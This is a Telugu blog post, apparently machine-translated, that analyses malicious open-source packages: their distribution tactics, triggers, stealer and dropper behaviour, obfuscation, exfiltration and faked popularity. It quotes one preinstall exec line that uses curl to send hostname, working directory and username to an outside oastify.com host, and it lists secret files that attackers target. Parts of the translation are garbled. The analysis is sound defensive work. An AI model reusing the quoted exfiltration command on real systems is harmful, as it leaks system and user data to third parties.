గత ఎపిసోడ్లో, ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీలు: సమస్యముప్పు కలిగించే శక్తులు ఎందుకంత అలా ఉన్నాయో మేము చర్చించాము కొత్త హానికరమైన భాగాలను ప్రచురించడానికి లేదా ఇప్పటికే ఉన్న భాగాల తాజా వెర్షన్లలో మాల్వేర్ను చొప్పించడానికి ఉత్సాహం: ఓపెన్ సోర్స్ మౌలిక సదుపాయాలు ఎక్కడైనా ఎవరికైనా తాత్కాలిక ఖాతాను సృష్టించడానికి అనుమతిస్తాయి ఒక కాంపోనెంట్ రిజిస్ట్రీలో (NPM, PyPI, Docker Hub లేదా Visual Studio Marketplace వంటివి) లేదా సహకార అభివృద్ధి ప్లాట్ఫారమ్లో (GitHub వంటిది). ఖర్చు సున్నా, మరియు థర్డ్-పార్టీ కాంపోనెంట్లపై సాఫ్ట్వేర్ బృందాలకు ఉండే అధిక నమ్మకాన్ని ఉపయోగించుకోవడానికి అనేక అవకాశాలు ఉన్నాయి.
ఓపెన్ సోర్స్ కోసం అందుబాటులో ఉన్న మౌలిక సదుపాయాలను ఉపయోగించి దాడి చేసేవారు మాల్వేర్ను వ్యాప్తి చేయడం ఎంత సులభమో, మరియు సాఫ్ట్వేర్ను అభివృద్ధి చేసే సంస్థలు (అందరూ?) మాల్వేర్ బారిన పడకుండా ఉండటం (మరియు వారు ఇతరుల కోసం పంపిణీ చేసే సాఫ్ట్వేర్లో మాల్వేర్ను చేర్చడం) ఎంత కష్టమో అనే ఈ రెండింటి మధ్య ఉన్న అసమానత, గత సంవత్సరం హానికరమైన ప్యాకేజీల సంఖ్య పావు మిలియన్ మార్కుకు దాదాపుగా చేరడానికి దారితీసింది.
ఇది ఎంతటి తీవ్రమైన సమస్య అంటే, దీనిని ఏ ఒక్క సంస్థ కూడా పరిష్కరించలేదు, మరియు కమ్యూనిటీ విశ్వాసం, సెక్యూర్-బై-డిఫాల్ట్ మరియు సెక్యూర్-బై-డిజైన్ సూత్రాలు, ఇంకా కాంపోనెంట్ల లైఫ్సైకిల్కు సంబంధించి ఓపెన్ సోర్స్ ప్రక్రియను పునర్నిర్వచించే ప్రక్రియలో ఉంది. మనం తదుపరి ఎపిసోడ్లో అటువంటి ఆలోచనలను పరిశీలిస్తాము. ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీల నుండి రక్షణ: ఏది (పనిచేయదు).
మనం చాలా వరకు అనుగుణంగా ఉండే సాఫ్ట్వేర్ భాగాల గురించి మాట్లాడుతున్నామని గుర్తుంచుకోండి సాఫ్ట్వేర్ ప్యాకేజీలు: పునర్వినియోగించదగిన కాంపోనెంట్లు సాఫ్ట్వేర్ మానిఫెస్ట్లో డిపెండెన్సీగా సూచించబడేలా మరియు ప్యాకేజీ మేనేజర్ లేదా బిల్డ్ టూల్తో ఇన్స్టాల్ చేయబడేలా ప్యాక్ చేయబడ్డాయి. దయచేసి గమనించండి, ఈ సందర్భాన్ని పబ్లిక్ను చేర్చడానికి విస్తరించవచ్చు. కంటైనర్ చిత్రాలు (కంటైనర్ రన్టైమ్లు మరియు కుబెర్నెటెస్ వంటి ఆర్కెస్ట్రేషన్ ప్లాట్ఫారమ్ల ద్వారా ఉపయోగించబడుతుంది), మరియు సాఫ్ట్వేర్ సాధనాలకు పొడిగింపులు (నిర్మాణం, ఆటోమేషన్ మరియు విస్తరణ కోసం).
ఇక్కడ మనం ఇది ఎలా ఉందో విశ్లేషిస్తాము హానికరమైన భాగాలపై ఆధారపడిన దాడి వ్యూహం గత ఉదాహరణల ప్రకారం మరియు మాల్వేర్ ముందస్తు హెచ్చరిక కోసం మా ప్లాట్ఫారమ్లో మేము చూసిన దాని ప్రకారం ఇది పనిచేస్తుంది (MEW). మేము హానికరమైన భాగాలను వివిధ కోణాల్లో విశ్లేషిస్తాము:
(1) పంపిణీ కోసం ఎంచుకున్న మార్గం (కొత్త లేదా ఇప్పటికే ఉన్న భాగంలో ఉపయోగించిన రిజిస్ట్రీ, మరియు ప్రచురించబడిన భాగం సంస్కరణను సోకించడానికి ఉపయోగించే సాంకేతికత), (2) మాల్వేర్ ఎలా యాక్టివేట్ చేయబడుతుంది లేదా ట్రిగ్గర్ చేయబడుతుంది, (3) హానికరమైన ప్రవర్తన అంటే ఏ హానికరమైన చర్యలు గమనించబడ్డాయి మరియు దాడి చేసేవారి ప్రేరణ ఏమిటి, (4) అస్పష్టత, గుర్తించబడకుండా దాచడం, పార్శ్వ కదలిక, కమాండ్ మరియు కంట్రోల్ (C2) హోస్ట్లతో కమ్యూనికేషన్ మొదలైన వాటికి ఏ పద్ధతులు సాధారణంగా ఉపయోగించబడతాయి; మరియు (5) బాధితులు ఆ కాంపోనెంట్ను ఇన్స్టాల్ చేసేలా తగినంత ప్రజాదరణ మరియు నమ్మకాన్ని పొందే పద్ధతులు.
ఎంచుకున్న పంపిణీ విధానం
మనం ఒక “వెనుకవైపు శబ్ధంతమ డిపెండెన్సీ ప్యాకేజీ పేరులో అక్షరదోషం ఉపయోగించి, అజాగ్రత్తగా ఉండే డెవలపర్లను ఫిషింగ్ చేయడానికి టైపోస్క్వాటింగ్ను వాడే అధునాతనం కాని హానికరమైన ప్యాకేజీలు ఉంటాయి. కొంతమంది అజాగ్రత్తగా ఉండే డెవలపర్లను ఫిషింగ్ చేయాలనే అంచనాతో, అనేక ప్రముఖ ప్యాకేజీలు అక్షరదోషాలతో కూడిన, అదే విధమైన పేర్లు గల ప్యాకేజీల వెల్లువను ఎదుర్కొంటాయి.
వారు ఒక తాత్కాలిక ఖాతాను ఉపయోగించి, టైపోస్క్వాట్ ప్యాకేజీల సమూహాన్ని ప్రచురించి, మరొకదాన్ని సృష్టించి, ఇంకొక సమూహాన్ని ప్రచురిస్తారు… కొంత ఆటోమేషన్ మరియు చాతుర్యాన్ని ఉపయోగించి వారు కొంత అధునాతనతను సాధించగలరు, కానీ సాధారణంగా అవి చాలా అల్పమైనవి. మేము అంతర్గతంగా వాటిని “ఆంకోవీస్క్రెడెన్షియల్స్ దొంగిలించడమే ప్రధాన లక్ష్యం, కానీ అప్పుడప్పుడు స్పైవేర్ సోర్స్ కోడ్ లేదా వ్యక్తిగతంగా గుర్తించదగిన సమాచారం (PII), క్లిప్బోర్డ్ క్యాప్చర్ మరియు ఇతర అనుమానాస్పద విషయాల వంటి సున్నితమైన డేటాను బయటకు పంపడాన్ని మనం గమనిస్తాము.
అకస్మాత్తుగా మనం మరింత అధునాతనమైన హానికరమైన భాగాలను, అంటే "షార్క్లను" చూస్తాము. వాటిలో ఒక మైనారిటీ నిర్దిష్ట సమూహాలను లేదా సంస్థలను లక్ష్యంగా చేసుకుంటాయి, సాధారణంగా షరతులతో కూడిన క్రిప్టో డ్రైనర్లు లేదా వెబ్ స్కిమ్మర్ల ద్వారా ఇవి పనిచేస్తాయి, బహుశా ఈ క్రింది విధానాన్ని అనుసరించి ఉండవచ్చు. ఈవెంట్-స్ట్రీమ్ సంఘటన లక్ష్య ప్యాకేజీ నుండి ప్యాకేజీని సూచించినప్పుడు మాత్రమే దాడి పేలోడ్ను డీక్రిప్ట్ చేయడం.
పంపిణీ యంత్రాంగాన్ని అద్భుతమైన మరియు ఇప్పుడు క్లాసిక్ అయిన పత్రంలో విశ్లేషించారు,వెన్నుపోటుదారుడి కత్తి సేకరణ: ఓపెన్ సోర్స్ సాఫ్ట్వేర్ సరఫరా గొలుసు దాడుల సమీక్ష”, ఇది తప్పక చదవవలసినది. ఈ చక్కని చార్ట్ను మీరు ఇంతకు ముందే చూసి ఉంటారు:

కొత్త మరియు ఇప్పటికే ఉన్న ప్యాకేజీలతో సహా అన్ని మార్గాలను అన్వేషించారు; సోర్స్ కోడ్, బిల్డ్ సిస్టమ్ లేదా ప్యాకేజీ చేయబడిన కాంపోనెంట్ను ప్రభావితం చేయడం; దొంగిలించబడిన క్రెడెన్షియల్స్ లేదా సోషల్ ఇంజనీరింగ్ను ఉపయోగించడం; వదిలివేయబడిన ఖాతాలు మరియు రిపోజిటరీలను హైజాక్ చేయడం లేదా నిర్వహించబడుతున్న వాటిని విషపూరితం చేయడం వంటివి చేశారు. కొన్ని దాడులకు పేర్లు పెట్టారు (టైపోస్క్వాటింగ్, ఆధారపడటం గందరగోళం, స్పష్టమైన గందరగోళం, రెపో-జాకింగ్. మొదలైనవి) మరియు ఇప్పటికే ఇతరచోట్ల చర్చించబడ్డాయి.
ఎంచుకున్న రిజిస్ట్రీల సంగతేంటి?
హానికరమైన ప్యాకేజీల మొత్తం సంఖ్యలో NPM అగ్రస్థానంలో కొనసాగుతోంది, కానీ ఈ సంవత్సరం నుండి PyPIలో వాటి సంఖ్య పెరగడాన్ని మేము గమనించాము. పైథాన్ అనేది డేటా సైన్స్ మరియు మెషిన్ లెర్నింగ్ కోసం ఒక ప్రసిద్ధ ఎకోసిస్టమ్. వాస్తవానికి, ఇప్పుడు NPM కంటే PyPIలోనే మాల్వేర్ సాంద్రత ఎక్కువగా ఉంది.
మాల్వేర్ ఎలా ప్రేరేపించబడుతుంది
ప్రతి 10 కేసులలో కేవలం 4 కేసులలో మాత్రమే ఇన్స్టాలేషన్ సమయంలో హానికరమైన ప్యాకేజీలు ప్రేరేపించబడతాయి (ఇటీవలి సంవత్సరాలలో ఇది 10కి దాదాపు 6గా ఉండేది). మిగిలినవి రన్టైమ్లో హానికరమైన ప్రవర్తనను ప్రదర్శిస్తాయి, పరీక్షలను నడుపుతున్నప్పుడు ప్రతి 100 కేసులలో ఒకటి ప్రేరేపించబడుతుంది. అనేక చోట్ల ఇన్స్టాలేషన్ స్క్రిప్ట్ల అనియంత్రిత అమలు నిలిపివేయబడిందని శత్రువులకు తెలిసినట్లుగా ఉంది.
దుర్మార్గులకు ఏమి దక్కుతోంది?
మేము హానికరమైన ప్రవర్తన వర్గాలను, అత్యంత ప్రజాదరణ పొందిన వాటిని మొదటగా ఉంచి జాబితా చేస్తాము. ప్రభావం చాలా భిన్నంగా ఉండవచ్చని దయచేసి గమనించండి: a వైపర్ ఇది మొండిగా విధ్వంసకరమైనది, కానీ ఇది సర్వసాధారణం కాదు మరియు లక్షిత సైబర్ యుద్ధ ప్రచారాలు లేదా క్రూరమైన హ్యాక్టివిజంకు సంబంధించిన కొన్ని సందర్భాల్లో మాత్రమే కనిపించింది. కింది వర్గాలు చాలా సాధారణమైనవి:
- ఇన్ఫోస్టీలర్ / క్రెడెన్షియల్స్ డ్రైనర్అత్యంత తరచుగా జరిగే, 90% కంటే ఎక్కువ అధునాతనం కాని దాడులు ప్రధానంగా పాస్వర్డ్లు, యాక్సెస్ టోకెన్లు, API కీలు మరియు ప్రైవేట్ కీలు (SSH మరియు అలాంటి వాటి కోసం) వంటి ఆధారాల కోసం వెతికే సాధారణ దొంగతనాలు. (వైపర్లతో పాటుగా?) దీన్ని రాయడం బహుశా చాలా సులభం. అవి తెలిసిన ఫైల్లు/డైరెక్టరీలు మరియు ఇతర మూలాలను (ఉదా. రిజిస్ట్రీ కీలు) జాబితా చేస్తాయి, వాటిలోని విషయాలను ప్యాకేజీ చేసి, ఆ డేటాను ఒక C2 సర్వర్కు పంపుతాయి. దీని వెనుక ఉన్న ఆలోచన చాలా సులభం: “ఫిషింగ్ ఆధారాల కోసం నేను ఒక దొంగను ప్రచురిస్తాను, తద్వారా ఆ ఆధారాలను ఉపయోగించి నేను తర్వాత ఒక నిర్దేశిత దాడిని ప్రారంభించగలను”.
సాధారణంగా కనిపించే C2 నెట్వర్కింగ్ అనేది టెలిగ్రామ్ ఛానెల్స్ వంటి చౌకబారు మరియు నాసిరకమైనది. ఎన్గ్రాక్ లాంటి సొరంగం తవ్వే సాధనాలు (తరచుగా VPN ఎగ్రెస్ IPల ద్వారా బహిర్గతమయ్యే రివర్స్ ప్రాక్సీల రూపంలో). వందలాది (!) అవకాశాలు ఉన్నాయి, వీటి కింద అనేక గిట్హబ్ ప్రాజెక్ట్లు ఉన్నాయి. పాస్వర్డ్-దొంగ అంశంహానికరమైన ప్యాకేజీలు మరియు కంటైనర్ ఇమేజ్ల విషయంలో కీలాగర్ల వంటి ప్రత్యేకతలు అరుదుగా ఉంటాయి, కానీ వినియోగదారు పరస్పర చర్య అవసరమయ్యే టూల్ ఎక్స్టెన్షన్లలో ఇవి తరచుగా కనిపిస్తాయి.
- డ్రాపర్ / డౌన్లోడర్జనాదరణలో రెండవ స్థానంలో ఉన్నప్పటికీ, ఇవి సాధారణంగా బహుళ-దశల దాడులలో మొదటి స్థానంలో ఉంటాయి. హానికరమైన భాగాలలో మూడింటిలో ఒకదాని కంటే ఎక్కువ వాటికి డ్రాపర్లు (ప్యాకేజీలోనే హానికరమైన పేలోడ్ చేర్చబడి ఉంటే) లేదా డౌన్లోడర్లు (దాడి చేసేవారి నియంత్రణలో ఉన్న ఎండ్పాయింట్ నుండి పేలోడ్ డౌన్లోడ్ చేయబడితే) ఉంటాయి. ఈ పేలోడ్ తరచుగా తెలిసిన బైనరీ మాల్వేర్ వేరియంట్ అయి ఉంటుంది, మరియు దీనిని బ్యాక్డోర్లు, స్పైవేర్, క్రిప్టో డ్రైనర్లు మరియు ఇతర ఉపయోగాల కోసం ఇన్స్టాల్ చేయడానికి రన్ చేస్తారు, కొన్నిసార్లు నిల్వ కూడా చేస్తారు. డౌన్లోడ్ చేయబడిన లేదా డిప్లాయ్ చేయబడిన పేలోడ్, ఇప్పటికే ఉన్న మాల్వేర్ బైనరీల ద్వారా అందించబడిన పూర్తి శక్తితో రెండవ దశ దాడిని ప్రారంభిస్తుంది. ఊహించని సైట్లకు కనెక్ట్ అయ్యేటప్పుడు గుర్తించబడకుండా ఉండటానికి, ఈ బైనరీలను ప్యాకేజీలోనే పంపిణీ చేయవచ్చు, తరచుగా వీటిని ఇమేజ్లుగా లేదా హానిచేయని ఫైల్ రకాలుగా మారువేషంలో ఉంచుతారు.
- క్రిప్టోకరెన్సీ దొంగలు / మైనర్లుఆర్థిక ప్రేరేపిత శత్రువులు క్రిప్టోమైనర్లను నడపడానికి మీ క్లౌడ్ ఆస్తులను ఉపయోగించుకోవడానికి సిద్ధంగా ఉన్నారు (అవి క్లౌడ్ VMలో నడుస్తున్నాయో లేదో కూడా వారు గుర్తిస్తారు). వారు దేని గురించి పట్టించుకోరు. తక్కువ లాభ నిష్పత్తి దొంగిలించబడిన క్లౌడ్ ఇన్ఫ్రాస్ట్రక్చర్ కోసం బాధితుడికి విధించిన ప్రతి $53కి $1 చొప్పున. బాధితులకు అనుకోని బిల్లు వచ్చే వరకు ఈ విషయం తెలియకపోవచ్చు. అదృష్టవశాత్తూ, ఇది వస్తూ పోతూ ఉంటుంది. Cryptojacking హానికరమైన ప్యాకేజీలలోని ప్రచారాలు అప్పుడప్పుడు ప్రత్యక్షమై, ఆపై మాయమవుతాయి. ఇవి వాలెట్ వినియోగదారులను ఫిషింగ్ చేయడానికి లేదా చివరికి వాలెట్ ప్రొవైడర్ను లక్ష్యంగా చేసుకోవడానికి ప్రయత్నిస్తాయి. లెడ్జర్ దాడి.
ఇతర ప్రవర్తనలు, మోహరించడం వంటివి బ్యాక్డోర్ను రివర్స్ షెల్ తెరవడం ద్వారా రిమోట్ కోడ్ ఎగ్జిక్యూషన్ చేయడం గతంలో కంటే ఇప్పుడు తక్కువగా జరుగుతోంది. ఉదాహరణకు, 123rf_contributor_web ప్యాకేజీ (ఇప్పుడు రిజిస్ట్రీ నుండి తొలగించబడింది) నుండి కాపీ చేసి పేస్ట్ చేసిన రివర్స్ షెల్ ఎటువంటి అస్పష్టత లేకుండా తెరుచుకుంటుంది. రివర్స్ షెల్ చీట్ షీట్:

చట్టబద్ధమైన మరియు హానికరమైన అంశాలతో పాటు, మేము అనేక దుర్వినియోగాలను గమనించాము, వాటిలో ఇవి ఉన్నాయి:
స్పామ్ ప్యాకేజీలు
NPMలో ఎక్కువగా వేలాది చిన్న ప్యాకేజీలు ఉన్నాయి, వాటిలో మాల్వేర్ ఏమీ ఉండదు కానీ సులభంగా డబ్బు సంపాదించవచ్చని, మోసపూరితమైన వాగ్దానాలు, వయాగ్రా ఆఫర్లకు లింకులు మరియు అలాంటివన్నీ ఉంటాయి. కొంతమంది వినియోగదారులు ఇలాంటి స్పామ్ను ప్రచురించి, రిజిస్ట్రీ నుండి చాలా బ్యాండ్విడ్త్ను తీసుకుంటారు. బహుశా ఇండోనేషియాకు చెందిన మరో వ్యక్తి(లు) ఈ క్రింది విధంగా ప్రయోజనం పొందడానికి ప్రయత్నించారు. టీ ర్యాంక్ను దుర్వినియోగం చేయడం పదివేల కొద్దీ పరస్పర సంబంధం ఉన్న NPM ప్యాకేజీలను, వాటికి సంబంధించిన GitHub డమ్మీ రిపోజిటరీలతో సృష్టించడం ద్వారా, ఓపెన్-సోర్స్ డెవలపర్లకు పరిహారం అందించాలనేది దీని ఉద్దేశం. ఇది వినియోగ నిబంధనలను స్పష్టంగా ఉల్లంఘించడమే.
బగ్ బౌంటీ మరియు భద్రతా పరిశోధన బూటకాలు
ఒక ప్యాకేజీ, బగ్ బౌంటీ ప్రోగ్రామ్ల కోసం భద్రతా లోపాలను గుర్తించడం లేదా ఎకోసిస్టమ్లోని నిర్దిష్ట అంశాలపై పరిశోధన చేయడం వంటి మంచి ప్రయోజనాల కోసం డేటాను బయటకు పంపుతున్నట్లుగా తనను తాను వర్ణించుకుంటుంది. ఈ వర్గంలో మేము వేలాది ప్యాకేజీలను చూశాము, ఇవి పోర్ట్స్విగ్గర్ నుండి (ఉదా. oastify.com డొమైన్లోని హోస్ట్) బర్ప్ కొలాబరేటర్ చిరునామాకు గుర్తింపును పొందుతాయి కానీ మరీ సున్నితమైన డేటాను పొందవు. మేము తరచుగా వీటి నకళ్లను గమనించాము. ఆధారపడటం గందరగోళం అలెక్స్ బిర్సాన్ ద్వారా ప్రూఫ్-ఆఫ్-కాన్సెప్ట్, అరోరా-వెబ్మెయిల్-ప్రో ప్రీ-ఇన్స్టాల్ స్క్రిప్ట్లో ఈ చెడ్డ కోడ్ను అమలు చేసే ప్యాకేజీ (రిజిస్ట్రీ నుండి తీసివేయబడింది):
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done") మరియు ఒక “ఇది సరళమైన డిపెండెన్సీ కన్ఫ్యూజన్ అటాక్ ప్రూఫ్ ఆఫ్ కాన్సెప్ట్" నిరాకరణ వివరణ ప్యాకేజీ.జాసన్దురుద్దేశం లేకపోయినా కూడా, ఇది సేవా నిబంధనలను స్పష్టంగా ఉల్లంఘించడమే.
ఒక శుభవార్త ఏమిటంటే? హానికరమైన భాగాల ద్వారా జరిగే రాన్సమ్వేర్ దాడులను మేము (ఇప్పటివరకు) చూడలేదు. తెలియని కారణాల వల్ల, సైబర్ నేరగాళ్లు సాంప్రదాయ ఈమెయిల్ ఫిషింగ్, RDP-ఆధారిత, మరియు డ్రైవ్-బై డౌన్లోడ్ డెలివరీ విధానాలను ఎక్కువగా ఇష్టపడుతున్నట్లు కనిపిస్తోంది.
గమనించిన అదనపు పద్ధతులు

నిలకడ, రక్షణ తప్పించుకోవడం, సమాచార సేకరణ, కమాండ్ & కంట్రోల్ హోస్ట్లతో సంభాషణ, మరియు సమాచార బహిష్కరణ కోసం అనేక పద్ధతులు ఉపయోగించబడ్డాయి.
పట్టుదల రెండవ-దశ బైనరీ మాల్వేర్లోని నిలకడ లక్షణాలను ఉపయోగించి హానికరమైన భాగాలలో గుర్తింపు పొందబడుతుంది, కానీ కొన్నిసార్లు ఈ ప్రవర్తన ప్యాకేజీ కోడ్లో ఉంటుంది, షెడ్యూల్ చేయబడిన పనులు మరియు విండోస్ రిజిస్ట్రీలోని మార్పులు అత్యంత సాధారణమైనవి.
obfuscation ఇది సాధారణమే, కానీ అధునాతనమైనది కాదు. చాలా టైపోస్క్వాటింగ్ ప్యాకేజీలు ("గుర్తుంచుకోండి")ఆంకోవీస్అసలు అస్పష్టపరిచే పద్ధతులను ఉపయోగించరు; చాలామంది సాధారణమైన వాటిని (బేస్64/హెక్స్ ఎన్కోడింగ్ లేదా rot13 వంటి సబ్స్టిట్యూషన్ సైఫర్లు) ఉపయోగిస్తారు లేదా అందుబాటులో ఉన్న కోడ్ అస్పష్టపరిచే సాధనాలను మరియు మినిఫికేషన్ను వాడతారు, వీటిని సరైన సాధనాలతో సులభంగా రివర్స్ చేయవచ్చు. కేవలం "షార్క్లు" మాత్రమే నిజమైన, అత్యంత కఠినమైన, రివర్స్-ఇంజనీరింగ్ చేయడం కష్టమైన అస్పష్టపరిచే పద్ధతులను ఉపయోగిస్తారు.
అస్పష్టత దాడిని దాచిపెట్టగలదు, కానీ ఒక ఓపెన్-సోర్స్ కాంపోనెంట్లోని కోడ్ను ఎందుకు అస్పష్టం చేయాలి? స్పష్టంగా కనిపించకుండా ఏదైనా దాచాల్సిన అవసరం ఉందని రుజువు ఉందా? మేధో సంపత్తిని రక్షించడానికి అస్పష్టతను ఉపయోగించే హానికరమైనవి కాని ప్యాకేజీల యొక్క అనేక ఉదాహరణలను మేము కనుగొన్నాము, ఇది "ఓపెన్ సోర్స్"కు విరుద్ధం. అస్పష్టతను మాల్వేర్కు సాక్ష్యంగా ఉపయోగించవచ్చు, కానీ అది నిశ్చయాత్మకమైనది కాదు. అస్పష్టతను తొలగించడం కూడా కష్టం.
ఎగవేత రక్షణ నియంత్రణల నుండి సరళమైన పద్ధతులను అవలంబిస్తుంది. హానికరమైన కోడ్ తరచుగా రక్షించబడుతుంది. ప్రయత్నించు … పట్టుకో ఏవైనా మినహాయింపులను విస్మరించే బ్లాక్లు, కాబట్టి అసాధారణ కార్యకలాపాలు లాగ్లలో చూపబడవు. ఒక నిర్దిష్ట సంస్థ లేదా వాతావరణాన్ని లక్ష్యంగా చేసుకునే మాల్వేర్ విషయంలో తప్ప, వాతావరణ ధృవీకరణ (VM లేదా కంటైనర్లో నడుస్తున్నది) అరుదుగా జరుగుతుంది.
చిత్రాలు మరియు PDF ఫైళ్ళలో బైనరీలను మభ్యపెట్టడం (ఒక రకమైన స్టెగానోగ్రఫీ) అనేది గుర్తింపును తప్పించుకోవడానికి కనిపించిన మరో పద్ధతి.
అత్యంత సాధారణ హానికరమైన అంశాలు సమాచార దొంగలు కాబట్టి, వివరాల సేకరణ ఇది చాలా అవసరం. రహస్యాలు (పాస్వర్డ్లు, యాక్సెస్ టోకెన్లు, API కీలు, క్రిప్టోగ్రాఫిక్ కీలు) లాగ్ ఫైల్స్, ఎన్విరాన్మెంట్ వేరియబుల్స్ మరియు క్లిప్బోర్డ్లో కూడా నిత్యం స్కాన్ చేయబడతాయి (బ్యాంకింగ్ ట్రోజన్లు మరియు క్రిప్టో స్టీలర్ల విషయంలో ఇది గమనించబడింది). సోర్స్ కోడ్ బహిర్గతం కావడం కూడా సర్వసాధారణం, ఎందుకంటే ప్యాకేజీ ఇన్స్టాలేషన్ తరచుగా డెవలప్మెంట్ నోడ్లో జరుగుతుంది, అక్కడ అంతర్గత గిట్ రిపోజిటరీలు క్లోన్ చేయబడి ఉండవచ్చు. గిట్ రిపోజిటరీల కోసం ప్యాకేజీలు డైరెక్టరీలను వెతకడాన్ని మేము చూశాము. .env, private.pem, settings.py, app.js, లేదా application.properties వంటి లొకేషన్ల కోసం వెతకడం చాలా సాధారణం.
డేటా వెలికితీత అనేది విస్తృతంగా ఉపయోగించే మరో చర్య. చాలా తక్కువ హానికరమైన ప్యాకేజీలు మాత్రమే వెలికితీసిన డేటా యొక్క గమ్యాన్ని దాచడానికి ప్రయత్నిస్తాయి. టెలిగ్రామ్ ఛానెళ్లు మరియు ఎన్గ్రోక్ లాంటి సొరంగాలు తరచుగా ఉపయోగించబడతాయి. మరియు చాలా ఉన్నాయి సాధారణంగా సమాచార లీకేజీ కోసం ఉపయోగించే వైట్లిస్ట్ చేయబడిన డొమైన్లు.
ప్రివిలేజ్ ఎస్కలేషన్ లేదా లాటరల్ మూవ్మెంట్ వంటి ఇతర పద్ధతులు తక్కువగా వాడుకలో ఉండేవి.
ప్రజాదరణ మరియు నమ్మకాన్ని పొందడం
చేతిలో సిద్ధంగా ఉన్న ఒక ప్రాణాంతకమైన హానికరమైన వస్తువుతో ఉన్న ఒక టెక్ నేరగాడు ఇలా ఆలోచిస్తున్నట్లు ఊహించుకోండి: “ఏమీ అనుమానించని ఆ మూర్ఖులకు ఈ చెత్తను ఎలా నమ్మదగినదిగా చేయాలి?”.
దీని అర్థం ఏమిటంటే, హానికరమైన కాంపోనెంట్ కోసం ఎంట్రీని ఎలా సృష్టించాలి, తద్వారా అది ప్రజాదరణ కోసం అనేక స్టార్లు / ఫోర్క్లు, అలాగే వెర్షన్లు / సమస్యలను చూపుతుంది. pull requests (కార్యకలాపం కోసం). దీని ఉద్దేశ్యం కల్పిత ప్రజాదరణ (స్టార్స్) మరియు ఆధారపడిన వారిని సంపాదించడం, అలాగే ప్రాసంగికత మరియు నిర్వహణ విషయంలో నమ్మకమైన రూపాన్ని ప్రదర్శించడం.
గిట్హబ్ ప్రాజెక్ట్లోని కంటెంట్లు మరియు ప్యాకేజీ కంటెంట్లు సరిపోలుతున్నాయో లేదో రిజిస్ట్రీ తనిఖీ చేయదు.ఇది సాఫ్ట్వేర్ సరఫరా గొలుసులో అందరికీ తెలిసిన సమస్య. పబ్లిక్ రిజిస్ట్రీలు అనేవి వాటిలో వేసిన ప్రతిదాన్నీ మింగేసే భారీ గొయ్యిల వంటివి. మీరు ఏ రిపోజిటరీనైనా లింక్ చేయవచ్చు.

హానికరమైన ప్యాకేజీ ఇప్పటికే జనాదరణ పొందిన రిపోజిటరీని తప్పుగా వాడుకుంటే, అది సులభం: ప్యాకేజీని సృష్టించడానికి మరియు దానిని రిజిస్ట్రీలో ప్రచురించడానికి ఉపయోగించే డిపెండెన్సీల మానిఫెస్ట్లో ఇప్పటికే ఉన్న GitHub రిపోజిటరీని సూచిస్తే సరిపోతుంది. నకిలీ GitHub రిపోలో కొత్త ప్యాకేజీల కోసం, మీకు మరింత చాకచక్యం అవసరం కావచ్చు, బహుశా నకిలీ రిపోజిటరీని సృష్టించాల్సి రావచ్చు. నక్షత్రాలను చూడటం/ఫోర్కింగ్ స్క్రిప్టింగ్ ద్వారా గిట్హబ్ ఖాతాలు.
మరియు మీ ప్యాకేజీలోని కంటెంట్లు రెపోలోని కంటెంట్లకు చాలా వరకు సారూప్యంగా ఉంటే, అక్కడక్కడా చక్కగా రూపొందించిన ఒకటి రెండు మార్పులు చొప్పించండి… మీరు ఇప్పటికే ఉన్న ప్యాకేజీ యొక్క రిపోజిటరీని సూచిస్తూ, ఒక ప్రసిద్ధ ప్యాకేజీని పోలిన కొత్త ప్యాకేజీలోకి మీ మాల్వేర్ను చొప్పించి, అందులోని అక్షరదోషాల కోసం వేచి ఉండవచ్చు. ఎవరైనా ప్యాకేజీ టార్బాల్లోని కంటెంట్లను గిట్హబ్ రిపోజిటరీలోని కంటెంట్లతో పోల్చి చూసే సాహసం చేస్తే, మాల్వేర్ చొప్పించిన చోట్ల ఉన్న తేడాలను సులభంగా గుర్తించలేకపోవచ్చు. మేము ఈ విధానాన్ని ఇంతకుముందు చాలాసార్లు చూశాము.
ఒక విడిభాగం దాని మూలం గురించి, అంటే ఆ ప్యాకేజీని ఎలా, ఏ వనరుల నుండి, మరియు ఎవరు తయారు చేశారనే దాని గురించి, తారుమారు చేయలేని విధంగా ఒక ప్రకటన చేసే యంత్రాంగం ఉంటే బాగుంటుంది. కానీ అది వేరే విషయం.
కాంపోనెంట్ X మాల్వేరా?
హానికరమైన ప్యాకేజీల (సమగ్రమైన) డేటాబేస్ ఉందా? లేదు. ఓపెన్-సోర్స్ బలహీనతలకు CVE ID కేటాయించబడింది, కానీ కొన్ని హానికరమైన ప్యాకేజీలకు (ముఖ్యంగా వార్తల్లో నిలిచే వాటికి) మాత్రమే ఒకటి ఇవ్వబడుతుంది. హానికరమైన ప్యాకేజీల కోసం CWE CWE-506 (హానికరమైన కోడ్ పొందుపరచబడింది).
సాధారణ మాల్వేర్ టూల్స్ (వైరస్టోటల్, మాల్వేర్బజార్, సోరెల్-20M…) హానికరమైన భాగాల కోసం ప్రత్యేక ఏర్పాట్లు చేయవు. అలా చేస్తే బాగుంటుంది!
విశ్లేషణ కోసం పరిశోధన నమూనా డేటాబేస్లు మరియు డేటాసెట్లు ఉన్నాయి (మేము వాటిలో కొన్నింటిని ఉపయోగిస్తాము), కానీ హానికరమైన ప్యాకేజీ గురించి తెలిసినప్పుడు మాత్రమే ఎంట్రీలు నవీకరించబడతాయి, అప్పటికి చాలా ఆలస్యం అయిపోతుంది. మీకు ఆసక్తి ఉంటే, OpenSSF హానికరమైన ప్యాకేజీలు ఇది మంచి ప్రారంభం.
తదుపరి పోస్ట్లో, ఇచ్చిన ప్యాకేజీ హానికరమైనదో కాదో ఎలా తెలుసుకోవాలో చర్చిస్తాము. ముందుగానే చెబుతున్నాం: అవును, రిజిస్ట్రీ ఒక తెలిసిన హానికరమైన భాగాన్ని తొలగించడానికి ముందే, ఎక్స్పోజర్ విండో ప్రారంభ దశలోనే హానికరమైన భాగాలను తనిఖీ చేయడానికి మార్గాలు ఉన్నాయి.
మరింత చదవడానికి
